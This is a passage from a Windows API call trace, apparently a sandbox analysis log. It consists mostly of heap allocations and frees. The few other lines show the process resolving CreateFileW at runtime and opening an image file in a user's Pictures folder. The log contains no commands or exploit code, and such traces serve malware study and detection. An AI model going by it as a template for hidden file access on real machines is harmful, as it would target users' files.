(HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2450 [0087.905] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0d0 | out: hHeap=0x1780000) returned 1 [0087.905] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0087.905] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca160 [0087.905] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0087.905] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0087.905] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0087.905] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0d0 [0087.905] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2480 [0087.905] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0d0 | out: hHeap=0x1780000) returned 1 [0087.905] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0087.905] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca118 [0087.905] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0087.905] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0087.905] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0087.905] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e90 [0087.905] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0087.905] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0d0 [0087.905] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca178 [0087.905] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2470 [0087.905] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca178 | out: hHeap=0x1780000) returned 1 [0087.905] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0087.906] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ef0 [0087.906] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0087.906] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f08 [0087.906] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0087.906] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca178 [0087.906] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0087.906] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0087.906] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0087.906] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0087.906] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0087.906] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0087.906] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0087.906] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca298 [0087.906] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0087.906] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0087.906] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0087.906] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0087.906] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0087.906] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0087.906] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0087.906] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0087.906] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0087.906] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0087.906] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0087.907] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0087.907] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0087.907] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0087.907] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0087.907] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0087.907] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0087.907] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0087.907] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0087.907] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0087.907] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0087.907] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0087.907] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0087.907] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0087.907] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0087.907] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0087.907] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0087.907] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0087.907] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0087.907] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0087.907] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0087.907] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0087.907] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0087.907] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0087.908] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3a0 [0087.908] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0087.908] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0087.908] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0087.908] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0087.908] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0087.908] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0087.908] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0087.908] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2350 [0087.908] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0087.908] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0087.908] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0087.908] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0087.908] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0087.908] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5250 [0087.909] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8de0 | out: hHeap=0x1780000) returned 1 [0087.909] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0087.909] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0087.909] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0087.909] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2510 [0087.909] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0087.909] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0087.909] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0087.909] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2490 [0087.909] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0087.909] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0087.909] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0087.909] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0087.909] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0087.909] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0087.909] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0087.909] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2490 [0087.909] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0087.909] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0087.909] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24f0 [0087.909] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0087.909] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0087.909] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0087.910] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0087.910] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0087.910] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24f0 [0087.910] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0087.910] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0087.910] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0087.910] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0087.910] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0087.910] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0087.910] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0087.910] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0087.910] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0087.910] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0087.910] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0087.910] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2330 [0087.910] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0087.910] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0087.910] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0087.910] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0087.910] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0087.910] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0087.910] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0087.910] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2330 [0087.911] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2340 [0087.911] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0087.911] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0087.911] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0087.911] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0087.911] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0087.911] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2330 [0087.911] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0087.911] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2340 [0087.911] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2350 [0087.911] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0087.911] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0087.911] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0087.911] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0087.911] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0087.911] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2380 [0087.911] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0087.911] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2340 [0087.911] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2350 [0087.911] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0087.911] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0087.911] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0087.911] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0087.912] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0087.912] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2340 [0087.912] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0087.912] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2350 [0087.912] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0087.912] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0087.912] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0087.912] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0087.912] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0087.912] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0087.912] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0087.912] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0087.912] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2350 [0087.912] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.912] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca478 [0087.912] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43ca478, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0087.912] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0087.913] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0087.913] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0087.913] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0087.913] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0087.913] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2350 [0087.913] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0087.913] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0087.913] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0087.913] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0087.913] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0087.913] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0087.913] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x4506008 [0087.914] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0087.914] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0087.914] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0087.914] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0087.914] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0087.914] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0087.914] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0087.914] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0087.915] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\fW_IRtjvKhZB-.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\fw_irtjvkhzb-.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x258 [0087.915] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0087.915] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea2e0 [0087.915] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0087.915] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0087.915] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0087.915] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0087.915] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0087.915] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0087.915] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0087.915] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0087.915] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0087.915] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0087.915] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0087.915] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0087.915] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0087.915] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x43595f0 [0087.915] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4506008 | out: hHeap=0x1780000) returned 1 [0087.916] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0087.916] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0087.916] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0087.916] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0087.916] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0087.916] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0087.916] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0087.916] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0087.916] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0087.916] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0087.916] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0087.916] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0087.916] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0087.916] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0087.916] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0087.916] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0087.916] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0087.916] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0087.916] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0087.916] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0087.916] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0087.917] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0087.917] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0087.917] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0087.917] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0087.917] FreeLibrary (hLibModule=0x772d0000) returned 1 [0087.917] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0087.917] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0087.917] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0087.917] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0087.917] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0087.917] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0087.917] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0087.917] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0087.917] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0087.917] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0087.917] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f08 | out: hHeap=0x1780000) 